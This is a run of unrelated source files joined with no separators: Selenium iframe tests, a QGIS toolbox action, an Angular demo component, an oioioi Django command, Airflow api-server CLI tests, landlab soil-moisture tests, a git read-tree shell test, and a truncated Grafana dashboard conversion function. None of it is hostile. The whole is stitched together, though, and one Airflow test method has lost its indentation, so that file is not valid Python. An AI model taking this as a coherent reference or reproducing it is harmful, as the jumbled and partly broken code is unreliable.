    """Frame deletion/recovery scenario, locating the frame via a WebElement."""
    pages.load("frame_switching_tests/deletingFrame.html")
    iframe = driver.find_element(By.ID, "iframe1")
    WebDriverWait(driver, 3).until(EC.frame_to_be_available_and_switch_to_it(iframe))
    # we should be in the frame now
    killIframe = driver.find_element(By.ID, "killIframe")
    killIframe.click()
    driver.switch_to.default_content()
    addIFrame = driver.find_element(By.ID, "addBackFrame")
    addIFrame.click()
    # The old WebElement is stale after the frame was re-added; re-locate it.
    iframe = driver.find_element(By.ID, "iframe1")
    WebDriverWait(driver, 3).until(EC.frame_to_be_available_and_switch_to_it(iframe))
    WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "success")))
@pytest.mark.xfail_chrome(raises=NoSuchElementException)
@pytest.mark.xfail_marionette(raises=WebDriverException,
                              reason='https://github.com/mozilla/geckodriver/issues/614')
@pytest.mark.xfail_webkitgtk(raises=NoSuchElementException)
def testShouldNotBeAbleToDoAnythingTheFrameIsDeletedFromUnderUs(driver, pages):
    """Interacting while focused on a deleted frame raises NoSuchFrameException."""
    pages.load("frame_switching_tests/deletingFrame.html")
    # find_element_by_id() was removed in Selenium 4; use the By locator API.
    driver.switch_to.frame(driver.find_element(By.ID, "iframe1"))
    killIframe = driver.find_element(By.ID, "killIframe")
    killIframe.click()
    with pytest.raises(NoSuchFrameException):
        driver.find_element(By.ID, "killIframe").click()
def testShouldReturnWindowTitleInAFrameset(driver, pages):
    """driver.title must come from the currently selected frame's document."""
    pages.load("frameset.html")
    # find_element_by_name() was removed in Selenium 4; use the By locator API.
    driver.switch_to.frame(driver.find_element(By.NAME, "third"))
    assert "Unique title" == driver.title


def testJavaScriptShouldExecuteInTheContextOfTheCurrentFrame(driver, pages):
    """execute_script must run against the selected frame's window object."""
    pages.load("frameset.html")
    assert driver.execute_script("return window == window.top")
    driver.switch_to.frame(driver.find_element(By.NAME, "third"))
    assert driver.execute_script("return window != window.top")
@pytest.mark.xfail_chrome(reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198')
def testShouldNotSwitchMagicallyToTheTopWindow(driver, pages):
    """Repeated submits inside a frame must not pop focus to the top window."""
    import random  # hoisted out of the loop; was re-imported on every iteration

    pages.load("frame_switching_tests/bug4876.html")
    driver.switch_to.frame(0)
    WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "inputText")))

    for i in range(20):
        try:
            # Renamed from ``input`` to avoid shadowing the builtin.
            input_field = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "inputText")))
            submit = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "submitButton")))
            input_field.clear()
            # BUG FIX: int(random.random()) is always 0, so every iteration
            # submitted the same value; randint gives a genuinely random suffix.
            input_field.send_keys("rand%s" % random.randint(0, 1000000))
            submit.click()
        finally:
            url = driver.execute_script("return window.location.href")
            # IE6 and Chrome add "?"-symbol to the end of the URL
            if url.endswith("?"):
                url = url[:-1]
            # Still inside the iframe — a "magic" switch to top would fail here.
            assert pages.url("frame_switching_tests/bug4876_iframe.html") == url
def testGetShouldSwitchToDefaultContext(driver, pages):
    """Loading a new page must implicitly reset focus to the default content."""
    pages.load("iframes.html")
    driver.find_element(By.ID, "iframe1")
    driver.switch_to.frame(driver.find_element(By.ID, "iframe1"))
    driver.find_element(By.ID, "cheese")  # Found on formPage.html but not on iframes.html.
    pages.load("iframes.html")  # This must effectively switch_to.default_content(), too.
    driver.find_element(By.ID, "iframe1")
# -*- coding: utf-8 -*-
"""
***************************************************************************
AddScriptFromTemplateAction.py
---------------------
Date                 : March 2018
Copyright : (C) 2018 by Matteo Ghetta
Email : matteo dot ghetta at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Matteo Ghetta'
__date__ = 'March 2018'
__copyright__ = '(C) 2018, Matteo Ghetta'
import os
import codecs
from qgis.PyQt.QtCore import QCoreApplication
from qgis.core import QgsApplication
from processing.gui.ToolboxAction import ToolboxAction
from processing.script.ScriptEditorDialog import ScriptEditorDialog
class AddScriptFromTemplateAction(ToolboxAction):
    """Processing toolbox action that opens the script editor pre-filled
    with the bundled ``ScriptTemplate.py`` template."""

    def __init__(self):
        # Menu entry shown in the Processing toolbox "Tools" group.
        self.name = QCoreApplication.translate("AddScriptFromTemplate", "Create New Script from Template…")
        self.group = self.tr("Tools")

    def execute(self):
        """Open a ScriptEditorDialog seeded with the template's source text."""
        dlg = ScriptEditorDialog(None)
        # The template ships with the plugin: <plugin>/script/ScriptTemplate.py
        pluginPath = os.path.split(os.path.dirname(__file__))[0]
        templatePath = os.path.join(
            pluginPath, 'script', 'ScriptTemplate.py')
        with codecs.open(templatePath, 'r', encoding='utf-8') as f:
            templateTxt = f.read()
        dlg.editor.setText(templateTxt)
        dlg.show()
import {Component} from '@angular/core';
import {HEROES} from './mock-heroes';
import {HeroListEnterLeave} from './hero-list-enter-leave';
// Demo page hosting the enter/leave animation example: renders the hero
// list component and removes a hero from the local array when the child
// emits a `remove` event.
@Component({
  selector: 'app-hero-list-enter-leave-page',
  template: `
    <section>
      <h2>Enter/Leave</h2>
      <app-hero-list-enter-leave
        [heroes]="heroes"
        (remove)="onRemove($event)"
      ></app-hero-list-enter-leave>
    </section>
  `,
  imports: [HeroListEnterLeave],
})
export class HeroListEnterLeavePage {
  // Copy of the mock data so removals don't mutate the shared HEROES array.
  heroes = HEROES.slice();

  // Drop the hero with the given id; reassigning the array lets the child
  // component see the change and play its leave animation.
  onRemove(id: number) {
    this.heroes = this.heroes.filter((hero) => hero.id !== id);
  }
}
from django.core.management.base import BaseCommand
from django.db.models import F
from django.utils.translation import ugettext as _
from oioioi.problems.models import Problem
from oioioi.programs.models import ModelProgramSubmission
class Command(BaseCommand):
    """Management command that reports problems lacking a model solution
    which reached the maximum score."""

    help = str(
        _(
            "Prints problems without 100-scored model solution. If "
            "username is provided it shows only problems added by that "
            "user."
        )
    )

    def add_arguments(self, parser):
        parser.add_argument(
            '--user',
            metavar='USERNAME',
            help='Optional username for filtering problems.',
        )

    def handle(self, *args, **options):
        """Print a count followed by one line per offending problem."""
        username = options.get('user')
        problems = self.get_problems_without_correct_modelsolution(username)
        self.stdout.write('Problems: ' + str(len(problems)) + '\n')
        for problem in problems:
            message = u'- {name} / {short_name} ; id = {id}\n'.format(
                name=problem.name, short_name=problem.short_name, id=str(problem.pk)
            )
            self.stdout.write(message)

    def get_problems_without_correct_modelsolution(self, username=None):
        """Return problems with no model submission scoring the max score.

        If ``username`` is given, only problems authored by that user are
        considered.
        """
        if username is not None:
            problems = Problem.objects.filter(author__username=username)
        else:
            problems = Problem.objects.all()
        # Use .exists() instead of evaluating (and needlessly ordering) the
        # whole queryset: a cheap EXISTS query per problem, no row transfer.
        return [
            problem
            for problem in problems
            if not ModelProgramSubmission.objects.filter(
                score=F('submissionreport__scorereport__max_score'),
                model_solution__problem=problem,
            ).exists()
        ]
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import sys
from unittest import mock
import pytest
from rich.console import Console
from airflow.cli.commands import api_server_command
from airflow.exceptions import AirflowConfigException
from unit.cli.commands._common_cli_classes import _CommonCLIUvicornTestClass
console = Console(width=400, color_system="standard")
@pytest.mark.db_test
class TestCliApiServer(_CommonCLIUvicornTestClass):
    """CLI tests for ``airflow api-server``: dev-mode delegation, env-var
    handling, uvicorn argument plumbing, daemonization and SSL validation."""

    # Regexp used by the shared base class to locate the server process.
    main_process_regexp = r"airflow api-server"
    @pytest.mark.parametrize(
        "args",
        [
            pytest.param(
                ["api-server", "--port", "9092", "--host", "somehost", "--dev"],
                id="dev mode with port and host",
            ),
            pytest.param(
                ["api-server", "--port", "9092", "--host", "somehost", "--dev", "--proxy-headers"],
                id="dev mode with port, host and proxy headers",
            ),
            pytest.param(
                [
                    "api-server",
                    "--port",
                    "9092",
                    "--host",
                    "somehost",
                    "--dev",
                    "--log-config",
                    "my_log_config.yaml",
                ],
                id="dev mode with port, host and log config",
            ),
        ],
    )
    def test_dev_arg(self, args):
        """--dev must delegate to fastapi-cli's auto-reloading dev server."""
        with (
            mock.patch("fastapi_cli.cli._run") as mock_run,
        ):
            args = self.parser.parse_args(args)
            api_server_command.api_server(args)
            # The CLI options must be forwarded to fastapi-cli unchanged.
            mock_run.assert_called_with(
                entrypoint="airflow.api_fastapi.main:app",
                port=args.port,
                host=args.host,
                reload=True,
                proxy_headers=args.proxy_headers,
                command="dev",
            )
    @pytest.mark.parametrize(
        "args",
        [
            (["api-server"]),
            (["api-server", "--apps", "all"]),
            (["api-server", "--apps", "core,execution"]),
            (["api-server", "--apps", "core"]),
            (["api-server", "--apps", "execution"]),
        ],
        ids=[
            "default_apps",
            "all_apps_explicit",
            "multiple_apps_explicit",
            "single_app_core",
            "single_app_execution",
        ],
    )
    @pytest.mark.parametrize("dev_mode", [True, False])
    @pytest.mark.parametrize(
        "original_env",
        [None, "some_value"],
    )
    def test_api_apps_env(self, args, dev_mode, original_env):
        """
        Test that AIRFLOW_API_APPS is set and unset in the environment when
        calling the airflow api-server command
        """
        expected_setitem_calls = []
        if dev_mode:
            args.append("--dev")
        with (
            mock.patch("os.environ", autospec=True) as mock_environ,
            mock.patch("uvicorn.run"),
            mock.patch("fastapi_cli.cli._run"),
        ):
            # Mock the environment variable with initial value or None
            mock_environ.get.return_value = original_env
            # Parse the command line arguments and call the api_server command
            parsed_args = self.parser.parse_args(args)
            api_server_command.api_server(parsed_args)
            # Verify the AIRFLOW_API_APPS was set correctly
            if "--apps" in args:
                expected_setitem_calls.append(mock.call("AIRFLOW_API_APPS", parsed_args.apps))
            # Verify AIRFLOW_API_APPS was cleaned up: restored to its previous
            # value when one existed, otherwise popped from the environment.
            if original_env is not None:
                expected_setitem_calls.append(mock.call("AIRFLOW_API_APPS", original_env))
            else:
                mock_environ.pop.assert_called_with("AIRFLOW_API_APPS", None)
            # Verify that the environment variable was set and cleaned up correctly
            mock_environ.__setitem__.assert_has_calls(expected_setitem_calls)
    @pytest.mark.parametrize(
        ("cli_args", "expected_additional_kwargs"),
        [
            pytest.param(
                [
                    "api-server",
                    "--pid",
                    "/tmp/x.pid",
                    "--ssl-cert",
                    "ssl_cert_path_placeholder",
                    "--ssl-key",
                    "ssl_key_path_placeholder",
                    "--apps",
                    "core",
                ],
                {
                    "ssl_keyfile": "ssl_key_path_placeholder",
                    "ssl_certfile": "ssl_cert_path_placeholder",
                },
                id="api-server with SSL cert and key",
            ),
            pytest.param(
                [
                    "api-server",
                    "--log-config",
                    "my_log_config.yaml",
                ],
                {
                    "ssl_keyfile": None,
                    "ssl_certfile": None,
                    "log_config": "my_log_config.yaml",
                },
                id="api-server with log config",
            ),
        ],
    )
    def test_args_to_uvicorn(self, ssl_cert_and_key, cli_args, expected_additional_kwargs):
        """SSL/log-config CLI options must be forwarded verbatim to uvicorn.run."""
        cert_path, key_path = ssl_cert_and_key
        # Substitute real temp-file paths for the placeholders in the params;
        # the SSL validation requires the files to actually exist.
        if "ssl_cert_path_placeholder" in cli_args:
            cli_args[cli_args.index("ssl_cert_path_placeholder")] = str(cert_path)
            expected_additional_kwargs["ssl_certfile"] = str(cert_path)
        if "ssl_key_path_placeholder" in cli_args:
            cli_args[cli_args.index("ssl_key_path_placeholder")] = str(key_path)
            expected_additional_kwargs["ssl_keyfile"] = str(key_path)
        with (
            mock.patch("uvicorn.run") as mock_run,
        ):
            args = self.parser.parse_args(cli_args)
            api_server_command.api_server(args)
            mock_run.assert_called_with(
                "airflow.api_fastapi.main:app",
                **{
                    "host": args.host,
                    "port": args.port,
                    "workers": args.workers,
                    "timeout_keep_alive": args.worker_timeout,
                    "timeout_graceful_shutdown": args.worker_timeout,
                    "timeout_worker_healthcheck": args.worker_timeout,
                    "access_log": True,
                    "log_level": "info",
                    "proxy_headers": args.proxy_headers,
                    **expected_additional_kwargs,
                },
            )
@pytest.mark.parametrize(
"demonize",
[True, False],
)
@mock.patch("airflow.cli.commands.daemon_utils.TimeoutPIDLockFile")
@mock.patch("airflow.cli.commands.daemon_utils.setup_locations")
@mock.patch("airflow.cli.commands.daemon_utils.daemon")
@mock.patch("airflow.cli.commands.daemon_utils.check_if_pidfile_process_is_running")
@mock.patch("airflow.cli.commands.api_server_command.uvicorn")
def test_run_command_daemon(
self, mock_uvicorn, _, mock_daemon, mock_setup_locations, mock_pid_file, demonize
):
mock_setup_locations.return_value = (
mock.MagicMock(name="pidfile"),
mock.MagicMock(name="stdout"),
mock.MagicMock(name="stderr"),
mock.MagicMock(name="INVALID"),
)
args = self.parser.parse_args(
[
"api-server",
"--host",
"my-hostname",
"--port",
"9090",
"--workers",
"2",
"--worker-timeout",
"60",
]
+ (["--daemon"] if demonize else [])
)
mock_open = mock.mock_open()
with mock.patch("airflow.cli.commands.daemon_utils.open", mock_open):
api_server_command.api_server(args)
mock_uvicorn.run.assert_called_once_with(
"airflow.api_fastapi.main:app",
host="my-hostname",
port=9090,
workers=2,
timeout_keep_alive=60,
timeout_graceful_shutdown=60,
timeout_worker_healthcheck=60,
ssl_keyfile=None,
ssl_certfile=None,
access_log=True,
log_level="info",
proxy_headers=False,
)
if demonize:
assert mock_daemon.mock_calls[:3] == [
mock.call.DaemonContext(
pidfile=mock_pid_file.return_value,
files_preserve=None,
stdout=mock_open.return_value,
stderr=mock_open.return_value,
umask=0o077,
),
mock.call.DaemonContext().__enter__(),
mock.call.DaemonContext().__exit__(None, None, None),
]
assert mock_setup_locations.mock_calls == [
mock.call(
process="api_server",
pid=None,
stdout=None,
stderr=None,
log=None,
)
]
mock_pid_file.assert_has_calls([mock.call(mock_setup_locations.return_value[0], -1)])
if sys.version_info >= (3, 13):
# extra close is called in Python 3.13+ to close the file descriptors
assert mock_open.mock_calls == [
mock.call(mock_setup_locations.return_value[1], "a"),
mock.call().__enter__(),
mock.call(mock_setup_locations.return_value[2], "a"),
mock.call().__enter__(),
mock.call().truncate(0),
mock.call().truncate(0),
mock.call().__exit__(None, None, None),
mock.call().close(),
mock.call().__exit__(None, None, None),
mock.call().close(),
]
else:
assert mock_open.mock_calls == [
mock.call(mock_setup_locations.return_value[1], "a"),
mock.call().__enter__(),
mock.call(mock_setup_locations.return_value[2], "a"),
mock.call().__enter__(),
mock.call().truncate(0),
mock.call().truncate(0),
mock.call().__exit__(None, None, None),
mock.call().__exit__(None, None, None),
]
else:
assert mock_daemon.mock_calls == []
mock_setup_locations.mock_calls == []
mock_pid_file.assert_not_called()
mock_open.assert_not_called()
    @pytest.mark.parametrize(
        ("ssl_arguments", "error_pattern"),
        [
            (["--ssl-cert", "_.crt", "--ssl-key", "_.key"], "does not exist _.crt"),
            (["--ssl-cert", "_.crt"], "Need both.*certificate.*key"),
            (["--ssl-key", "_.key"], "Need both.*key.*certificate"),
        ],
    )
    def test_get_ssl_cert_and_key_filepaths_with_incorrect_usage(self, ssl_arguments, error_pattern):
        """Missing files or a lone cert/key must raise AirflowConfigException."""
        args = self.parser.parse_args(["api-server"] + ssl_arguments)
        with pytest.raises(AirflowConfigException, match=error_pattern):
            api_server_command._get_ssl_cert_and_key_filepaths(args)
    def test_get_ssl_cert_and_key_filepaths_with_correct_usage(self, ssl_cert_and_key):
        """Existing cert/key files are returned as a (cert, key) path tuple."""
        cert_path, key_path = ssl_cert_and_key
        args = self.parser.parse_args(
            ["api-server"] + ["--ssl-cert", str(cert_path), "--ssl-key", str(key_path)]
        )
        assert api_server_command._get_ssl_cert_and_key_filepaths(args) == (str(cert_path), str(key_path))
    @pytest.fixture
    def ssl_cert_and_key(self, tmp_path):
        """Create empty placeholder cert/key files and return their paths."""
        cert_path, key_path = tmp_path / "_.crt", tmp_path / "_.key"
        cert_path.touch()
        key_path.touch()
        return cert_path, key_path
"""
Unit tests for \
landlab.components.soil_moisture.soil_moisture_dynamics
"""
import numpy as np
import pytest
from numpy.testing import assert_array_almost_equal
(_SHAPE, _SPACING, _ORIGIN) = ((20, 20), (10e0, 10e0), (0.0, 0.0))
_ARGS = (_SHAPE, _SPACING, _ORIGIN)
def test_name(sm):
    """The component advertises its canonical name."""
    assert sm.name == "Soil Moisture"


def test_input_var_names(sm):
    """All required input fields are declared (compared in sorted order)."""
    assert sorted(sm.input_var_names) == [
        "rainfall__daily_depth",
        "soil_moisture__initial_saturation_fraction",
        "surface__potential_evapotranspiration_rate",
        "vegetation__cover_fraction",
        "vegetation__live_leaf_area_index",
        "vegetation__plant_functional_type",
    ]


def test_output_var_names(sm):
    """All produced output fields are declared (compared in sorted order)."""
    assert sorted(sm.output_var_names) == [
        "soil_moisture__root_zone_leakage",
        "soil_moisture__saturation_fraction",
        "surface__evapotranspiration",
        "surface__runoff",
        "vegetation__water_stress",
    ]
def test_var_units(sm):
    """Every input/output variable has declared units, and the units match."""
    # BUG FIX: the original read ``assert <set>, <set>`` — the comma made the
    # second set a (useless) assertion message, so the line only checked that
    # the union was non-empty. Compare the two sets for equality instead.
    assert set(sm.input_var_names) | set(sm.output_var_names) == set(
        dict(sm.units).keys()
    )

    assert sm.var_units("vegetation__cover_fraction") == "None"
    assert sm.var_units("vegetation__live_leaf_area_index") == "None"
    assert sm.var_units("surface__potential_evapotranspiration_rate") == "mm"
    assert sm.var_units("vegetation__plant_functional_type") == "None"
    assert sm.var_units("vegetation__water_stress") == "None"
    assert sm.var_units("soil_moisture__saturation_fraction") == "None"
    assert sm.var_units("soil_moisture__initial_saturation_fraction") == "None"
    assert sm.var_units("soil_moisture__root_zone_leakage") == "mm"
    assert sm.var_units("surface__runoff") == "mm"
    assert sm.var_units("surface__evapotranspiration") == "mm"
    assert sm.var_units("rainfall__daily_depth") == "mm"
def test_grid_shape(sm):
    """The component grid matches the module-level _SHAPE."""
    assert sm.grid.number_of_node_rows == _SHAPE[0]
    assert sm.grid.number_of_node_columns == _SHAPE[1]


def test_grid_x_extent(sm):
    """Grid x extent equals (columns - 1) * x spacing."""
    assert sm.grid.extent[1] == (_SHAPE[1] - 1) * _SPACING[1]


def test_grid_y_extent(sm):
    """Grid y extent equals (rows - 1) * y spacing."""
    assert sm.grid.extent[0] == (_SHAPE[0] - 1) * _SPACING[0]
def test_field_getters(sm):
    """Node and cell fields are ndarrays with the expected flat lengths."""
    for name in sm.grid["node"]:
        field = sm.grid["node"][name]
        assert isinstance(field, np.ndarray)
        assert field.shape == (
            sm.grid.number_of_node_rows * sm.grid.number_of_node_columns,
        )

    for name in sm.grid["cell"]:
        field = sm.grid["cell"][name]
        assert isinstance(field, np.ndarray)
        assert field.shape == (
            sm.grid.number_of_cell_rows * sm.grid.number_of_cell_columns,
        )

    # Unknown field names must raise, not silently return something.
    with pytest.raises(KeyError):
        sm.grid["not_a_var_name"]


def test_field_initialized_to_zero(sm):
    """All fields start out zero-filled."""
    for name in sm.grid["node"]:
        field = sm.grid["node"][name]
        assert_array_almost_equal(field, np.zeros(sm.grid.number_of_nodes))
    for name in sm.grid["cell"]:
        field = sm.grid["cell"][name]
        assert_array_almost_equal(field, np.zeros(sm.grid.number_of_cells))
#!/bin/sh
#
# Verifies that "git read-tree -m -u" refuses to clobber untracked working
# tree files during two-way and three-way merges, honors per-directory
# excludes, preserves local changes, and handles D/F and symlink cases.

test_description='read-tree -m -u checks working tree files'

GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main
export GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME

. ./test-lib.sh
. "$TEST_DIRECTORY"/lib-read-tree.sh

# two-tree test

test_expect_success 'two-way setup' '

	mkdir subdir &&
	echo >file1 file one &&
	echo >file2 file two &&
	echo >subdir/file1 file one in subdirectory &&
	echo >subdir/file2 file two in subdirectory &&
	git update-index --add file1 file2 subdir/file1 subdir/file2 &&
	git commit -m initial &&

	git branch side &&
	git tag -f branch-point &&

	echo file2 is not tracked on the main branch anymore &&
	rm -f file2 subdir/file2 &&
	git update-index --remove file2 subdir/file2 &&
	git commit -a -m "main removes file2 and subdir/file2"
'

test_expect_success 'two-way not clobbering' '

	echo >file2 main creates untracked file2 &&
	echo >subdir/file2 main creates untracked subdir/file2 &&
	if err=$(read_tree_u_must_succeed -m -u main side 2>&1)
	then
		echo should have complained
		false
	else
		echo "happy to see $err"
	fi
'

echo file2 >.gitignore

# An ignore file listing an untracked path must not be honored unless
# --exclude-per-directory is used with "-m -u".

test_expect_success 'two-way with incorrect --exclude-per-directory (1)' '

	if err=$(read_tree_u_must_succeed -m --exclude-per-directory=.gitignore main side 2>&1)
	then
		echo should have complained
		false
	else
		echo "happy to see $err"
	fi
'

test_expect_success 'two-way with incorrect --exclude-per-directory (2)' '

	if err=$(read_tree_u_must_succeed -m -u --exclude-per-directory=foo --exclude-per-directory=.gitignore main side 2>&1)
	then
		echo should have complained
		false
	else
		echo "happy to see $err"
	fi
'

test_expect_success 'two-way clobbering a ignored file' '

	read_tree_u_must_succeed -m -u --exclude-per-directory=.gitignore main side
'

rm -f .gitignore

# three-tree test

test_expect_success 'three-way not complaining on an untracked path in both' '

	rm -f file2 subdir/file2 &&
	git checkout side &&
	echo >file3 file three &&
	echo >subdir/file3 file three &&
	git update-index --add file3 subdir/file3 &&
	git commit -a -m "side adds file3 and removes file2" &&

	git checkout main &&
	echo >file2 file two is untracked on the main side &&
	echo >subdir/file2 file two is untracked on the main side &&

	read_tree_u_must_succeed -m -u branch-point main side
'

test_expect_success 'three-way not clobbering a working tree file' '

	git reset --hard &&
	rm -f file2 subdir/file2 file3 subdir/file3 &&
	git checkout main &&
	echo >file3 file three created in main, untracked &&
	echo >subdir/file3 file three created in main, untracked &&
	if err=$(read_tree_u_must_succeed -m -u branch-point main side 2>&1)
	then
		echo should have complained
		false
	else
		echo "happy to see $err"
	fi
'

echo >.gitignore file3

test_expect_success 'three-way not complaining on an untracked file' '

	git reset --hard &&
	rm -f file2 subdir/file2 file3 subdir/file3 &&
	git checkout main &&
	echo >file3 file three created in main, untracked &&
	echo >subdir/file3 file three created in main, untracked &&

	read_tree_u_must_succeed -m -u --exclude-per-directory=.gitignore branch-point main side
'

test_expect_success '3-way not overwriting local changes (setup)' '

	git reset --hard &&
	git checkout -b side-a branch-point &&
	echo >>file1 "new line to be kept in the merge result" &&
	git commit -a -m "side-a changes file1" &&
	git checkout -b side-b branch-point &&
	echo >>file2 "new line to be kept in the merge result" &&
	git commit -a -m "side-b changes file2" &&
	git checkout side-a
'

test_expect_success '3-way not overwriting local changes (our side)' '

	# At this point, file1 from side-a should be kept as side-b
	# did not touch it.

	git reset --hard &&

	echo >>file1 "local changes" &&
	read_tree_u_must_succeed -m -u branch-point side-a side-b &&
	grep "new line to be kept" file1 &&
	grep "local changes" file1
'

test_expect_success '3-way not overwriting local changes (their side)' '

	# At this point, file2 from side-b should be taken as side-a
	# did not touch it.

	git reset --hard &&

	echo >>file2 "local changes" &&
	read_tree_u_must_fail -m -u branch-point side-a side-b &&
	! grep "new line to be kept" file2 &&
	grep "local changes" file2
'

test_expect_success 'funny symlink in work tree' '

	git reset --hard &&
	git checkout -b sym-b side-b &&
	mkdir -p a &&
	>a/b &&
	git add a/b &&
	git commit -m "side adds a/b" &&

	rm -fr a &&
	git checkout -b sym-a side-a &&
	mkdir -p a &&
	test_ln_s_add ../b a/b &&
	git commit -m "we add a/b" &&

	read_tree_u_must_succeed -m -u sym-a sym-a sym-b
'

test_expect_success SANITY 'funny symlink in work tree, un-unlink-able' '

	test_when_finished "chmod u+w a 2>/dev/null; rm -fr a b" &&

	rm -fr a b &&
	git reset --hard &&

	git checkout sym-a &&
	chmod a-w a &&
	test_must_fail git read-tree -m -u sym-a sym-a sym-b
'

test_expect_success 'D/F setup' '

	git reset --hard &&

	git checkout side-a &&
	rm -f subdir/file2 &&
	mkdir subdir/file2 &&
	echo qfwfq >subdir/file2/another &&
	git add subdir/file2/another &&
	test_tick &&
	git commit -m "side-a changes file2 to directory"
'

test_expect_success 'D/F' '

	git checkout side-b &&
	read_tree_u_must_succeed -m -u branch-point side-b side-a &&
	git ls-files -u >actual &&
	(
		a=$(git rev-parse branch-point:subdir/file2) &&
		b=$(git rev-parse side-a:subdir/file2/another) &&
		echo "100644 $a 1	subdir/file2" &&
		echo "100644 $a 2	subdir/file2" &&
		echo "100644 $b 3	subdir/file2/another"
	) >expect &&
	test_cmp expect actual
'

test_expect_success 'D/F resolve' '

	git reset --hard &&
	git checkout side-b &&
	git merge-resolve branch-point -- side-b side-a
'

test_expect_success 'D/F recursive' '

	git reset --hard &&
	git checkout side-b &&
	git merge-recursive branch-point -- side-b side-a
'

test_done
package conversion
import (
"k8s.io/apimachinery/pkg/conversion"
"k8s.io/apimachinery/pkg/runtime"
dashv0 "github.com/grafana/grafana/apps/dashboard/pkg/apis/dashboard/v0alpha1"
dashv1 "github.com/grafana/grafana/apps/dashboard/pkg/apis/dashboard/v1beta1"
dashv2alpha1 "github.com/grafana/grafana/apps/dashboard/pkg/apis/dashboard/v2alpha1"
dashv2beta1 "github.com/grafana/grafana/apps/dashboard/pkg/apis/dashboard/v2beta1"
"github.com/grafana/grafana/apps/dashboard/pkg/migration/schemaversion"
)
// RegisterConversions registers dashboard conversion functions between all
// supported API versions (v0alpha1, v1beta1, v2alpha1, v2beta1) on the given
// scheme — twelve ordered pairs in total.
//
// Every converter is wrapped with withConversionMetrics (defined elsewhere;
// presumably instruments each conversion with its source/target API version).
// Conversions that build v2 dashboards from v0/v1 receive both the
// datasource and library-element index providers; the v2beta1 -> v0/v1
// downgrades need only the datasource provider; the remaining pairs are pure
// transformations taking just the conversion scope.
//
// Registration short-circuits: the first AddConversionFunc error is returned
// immediately, so a failure leaves later pairs unregistered. Returns nil on
// success.
func RegisterConversions(s *runtime.Scheme, dsIndexProvider schemaversion.DataSourceIndexProvider, leIndexProvider schemaversion.LibraryElementIndexProvider) error {
	// v0 conversions
	if err := s.AddConversionFunc((*dashv0.Dashboard)(nil), (*dashv1.Dashboard)(nil),
		withConversionMetrics(dashv0.APIVERSION, dashv1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
			return Convert_V0_to_V1beta1(a.(*dashv0.Dashboard), b.(*dashv1.Dashboard), scope)
		})); err != nil {
		return err
	}
	if err := s.AddConversionFunc((*dashv0.Dashboard)(nil), (*dashv2alpha1.Dashboard)(nil),
		withConversionMetrics(dashv0.APIVERSION, dashv2alpha1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
			return Convert_V0_to_V2alpha1(a.(*dashv0.Dashboard), b.(*dashv2alpha1.Dashboard), scope, dsIndexProvider, leIndexProvider)
		})); err != nil {
		return err
	}
	if err := s.AddConversionFunc((*dashv0.Dashboard)(nil), (*dashv2beta1.Dashboard)(nil),
		withConversionMetrics(dashv0.APIVERSION, dashv2beta1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
			return Convert_V0_to_V2beta1(a.(*dashv0.Dashboard), b.(*dashv2beta1.Dashboard), scope, dsIndexProvider, leIndexProvider)
		})); err != nil {
		return err
	}

	// v1 conversions
	if err := s.AddConversionFunc((*dashv1.Dashboard)(nil), (*dashv0.Dashboard)(nil),
		withConversionMetrics(dashv1.APIVERSION, dashv0.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
			return Convert_V1beta1_to_V0(a.(*dashv1.Dashboard), b.(*dashv0.Dashboard), scope)
		})); err != nil {
		return err
	}
	if err := s.AddConversionFunc((*dashv1.Dashboard)(nil), (*dashv2alpha1.Dashboard)(nil),
		withConversionMetrics(dashv1.APIVERSION, dashv2alpha1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
			return Convert_V1beta1_to_V2alpha1(a.(*dashv1.Dashboard), b.(*dashv2alpha1.Dashboard), scope, dsIndexProvider, leIndexProvider)
		})); err != nil {
		return err
	}
	if err := s.AddConversionFunc((*dashv1.Dashboard)(nil), (*dashv2beta1.Dashboard)(nil),
		withConversionMetrics(dashv1.APIVERSION, dashv2beta1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
			return Convert_V1beta1_to_V2beta1(a.(*dashv1.Dashboard), b.(*dashv2beta1.Dashboard), scope, dsIndexProvider, leIndexProvider)
		})); err != nil {
		return err
	}

	// v2alpha1 conversions
	if err := s.AddConversionFunc((*dashv2alpha1.Dashboard)(nil), (*dashv0.Dashboard)(nil),
		withConversionMetrics(dashv2alpha1.APIVERSION, dashv0.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
			return Convert_V2alpha1_to_V0(a.(*dashv2alpha1.Dashboard), b.(*dashv0.Dashboard), scope)
		})); err != nil {
		return err
	}
	if err := s.AddConversionFunc((*dashv2alpha1.Dashboard)(nil), (*dashv1.Dashboard)(nil),
		withConversionMetrics(dashv2alpha1.APIVERSION, dashv1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
			return Convert_V2alpha1_to_V1beta1(a.(*dashv2alpha1.Dashboard), b.(*dashv1.Dashboard), scope)
		})); err != nil {
		return err
	}
	if err := s.AddConversionFunc((*dashv2alpha1.Dashboard)(nil), (*dashv2beta1.Dashboard)(nil),
		withConversionMetrics(dashv2alpha1.APIVERSION, dashv2beta1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
